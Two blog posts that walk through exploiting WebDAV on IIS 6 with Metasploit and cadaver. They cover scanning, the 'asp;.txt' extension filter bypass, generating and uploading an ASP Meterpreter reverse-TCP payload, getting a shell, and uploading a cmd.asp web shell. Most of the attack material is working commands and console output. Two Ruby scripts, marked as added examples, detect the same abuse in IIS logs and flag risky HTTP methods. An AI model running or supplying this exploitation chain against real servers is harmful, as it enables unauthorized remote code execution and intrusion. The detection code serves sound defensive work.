Monday, May 3, 2010

More with Metasploit and WebDAV

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial; it's not bad. Pay attention to the part about giving your IUSR_WHATEVER account write access, or set up a Windows account to use authentication.

Metasploit has a few modules to test for WebDAV presence.

webdav_scanner:
msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip:
msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content:
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory. If someone has shared out the root directory it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or, if you have the path wrong:
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If you need to see which methods are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
To quickly see if you can upload things, give DAVtest a try or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. In this case I can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.

If you try to upload an .asp you'll get a 403 Forbidden, and if you try to COPY/MOVE a .txt to .asp you'll get a Forbidden as well. :-(

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

So we generate our evil.asp file using msfpayload and msfencode; you could also use any other asp shell too...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Upload it and rename it:
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
Now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell:
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.
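The ";" rename above is easy to spot on the server side. As an added example (not code from the post), here is a Ruby script that runs over constructed IIS W3C log lines and flags WebDAV write methods, writes aimed at script extensions (even refused ones, like the 403 above), and URI stems carrying the script-extension-plus-semicolon pattern; the field order comes from the #Fields line and the default IIS 6 field set is an assumption.

```ruby
WRITE_METHODS = %w[PUT COPY MOVE MKCOL DELETE PROPPATCH].freeze
SCRIPT_EXTS   = %w[asp aspx php jsp jhtml cgi pl cfm shtml].freeze
# Script extension followed by ';' (evil.asp;.txt) vs. as the stem's real last extension.
SEMICOLON_RE  = /\.(#{SCRIPT_EXTS.join('|')});/i
SCRIPT_RE     = /\.(#{SCRIPT_EXTS.join('|')})\z/i

# Constructed IIS W3C log lines; field order is taken from the #Fields line
# (default IIS 6 set assumed). IIS writes '+' for spaces in the UA field.
SAMPLE_LOG = <<~LOG
  #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
  2010-05-03 14:02:11 192.168.242.134 GET /iisstart.htm - 80 - 192.168.6.94 Mozilla/5.0 200 0 0
  2010-05-03 14:03:40 192.168.242.134 PUT /davaroo/tcp443meterp.txt - 80 - 192.168.6.94 cadaver/0.23 201 0 0
  2010-05-03 14:03:41 192.168.242.134 COPY /davaroo/tcp443meterp.txt - 80 - 192.168.6.94 cadaver/0.23 201 0 0
  2010-05-03 14:04:02 192.168.242.134 GET /davaroo/tcp443meterp.asp;.txt - 80 - 192.168.6.94 Mozilla/5.0 200 0 0
  2010-05-03 14:04:30 192.168.242.134 PUT /davaroo/notes.asp - 80 - 192.168.6.94 cadaver/0.23 403 0 0
LOG

# Parse W3C extended log text into rows keyed by the names on the #Fields line.
def parse_w3c(text)
  fields = nil
  rows = []
  text.each_line do |raw|
    line = raw.strip
    if line.start_with?('#Fields:')
      fields = line.sub('#Fields:', '').split
    elsif fields && !line.empty? && !line.start_with?('#')
      rows << fields.zip(line.split).to_h
    end
  end
  rows
end

# Tag one row: any WebDAV write, a write targeting a script extension (even a
# refused one, like the 403 in the post), and the IIS 6 ';' extension trick.
def classify(row)
  method = row['cs-method'].to_s.upcase
  stem = row['cs-uri-stem'].to_s
  tags = []
  tags << :webdav_write if WRITE_METHODS.include?(method)
  tags << :script_write_attempt if tags.include?(:webdav_write) && stem =~ SCRIPT_RE
  tags << :semicolon_extension if stem =~ SEMICOLON_RE
  tags
end

# Return one finding per tagged row (1-based row number, method, stem, status, tags).
def find_webdav_abuse(text)
  parse_w3c(text).each_with_index.map do |row, i|
    tags = classify(row)
    tags.empty? ? nil : { line: i + 1, method: row['cs-method'], uri: row['cs-uri-stem'], status: row['sc-status'], tags: tags }
  end.compact
end
```

The COPY row shows why the GET on the ";" name matters: the Destination header of a COPY/MOVE is not in the W3C log, so the renamed file only becomes visible when it is requested.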

More info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb

Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module, I wanted to see if I could get one going that would pull down the HTTP verbs allowed on a web server.

Basically I wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a Metasploit auxiliary module. So I got it going... mostly HD's module, but I changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
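The module's logic is just an OPTIONS request plus a read of the Allow (or Public) header. As an added example, not the module's code, here is a stand-alone Ruby version that parses the header list and marks the WebDAV write verbs and TRACE a defender would not want reachable on a web root; SAMPLE_IIS_HEADERS is a constructed copy of the IIS 6.0 response shown above, and options_probe is the live probe (assumed to run against a host you are authorised to test).

```ruby
require 'net/http'
require 'uri'

# WebDAV write verbs plus TRACE: methods a web root should not expose anonymously.
RISKY_METHODS = %w[PUT DELETE COPY MOVE MKCOL PROPPATCH LOCK UNLOCK TRACE].freeze

# "OPTIONS, TRACE, GET" or Apache-style "GET,HEAD,POST" -> ["OPTIONS", "TRACE", "GET"] etc.
def parse_method_list(value)
  value.to_s.split(',').map { |m| m.strip.upcase }.reject(&:empty?).uniq
end

# headers: name => value (any case). Allow wins; Public is the IIS fallback.
def assess_options_headers(headers)
  h = headers.transform_keys { |k| k.to_s.downcase }
  methods = parse_method_list(h['allow'] || h['public'])
  dav = h['dav'].to_s.strip
  { methods: methods, risky: methods & RISKY_METHODS, dav_class: dav, webdav: !dav.empty? }
end

# Live probe: send OPTIONS for one path and assess the response headers.
def options_probe(url, path = '/')
  uri = URI(url)
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') do |http|
    res = http.request(Net::HTTP::Options.new(path))
    assess_options_headers(res.to_hash.transform_values { |v| v.join(', ') })
  end
end

# Constructed sample mirroring the IIS 6.0 OPTIONS response shown in the post.
SAMPLE_IIS_HEADERS = {
  'Server' => 'Microsoft-IIS/6.0',
  'DAV' => '1,2',
  'Public' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
  'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH'
}.freeze

if __FILE__ == $0
  r = assess_options_headers(SAMPLE_IIS_HEADERS)
  puts "WebDAV advertised: #{r[:webdav]} (DAV: #{r[:dav_class]})"
  puts "Risky methods: #{r[:risky].join(', ')}"
end
```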

I'll post the code on carnal0wnage when I get off my butt, and a little something something that gives you a status if you are scanning a Class C.

**More on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

Then you have to do a MOVE or COPY request. Personally I was having issues getting a MOVE request to work with a netcat connection, so I used...

**UPDATE
It ended up being the carriage returns (or lack thereof) that were causing me to get a 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

From there you will want to upload your cmd.asp so you can execute commands on the box.

(Screenshot: browsing to upload.asp and uploading our cmd.asp (cmdx.aspx))

(Screenshot: interacting with our cmdx.aspx to list the directory contents of the C drive)

-CG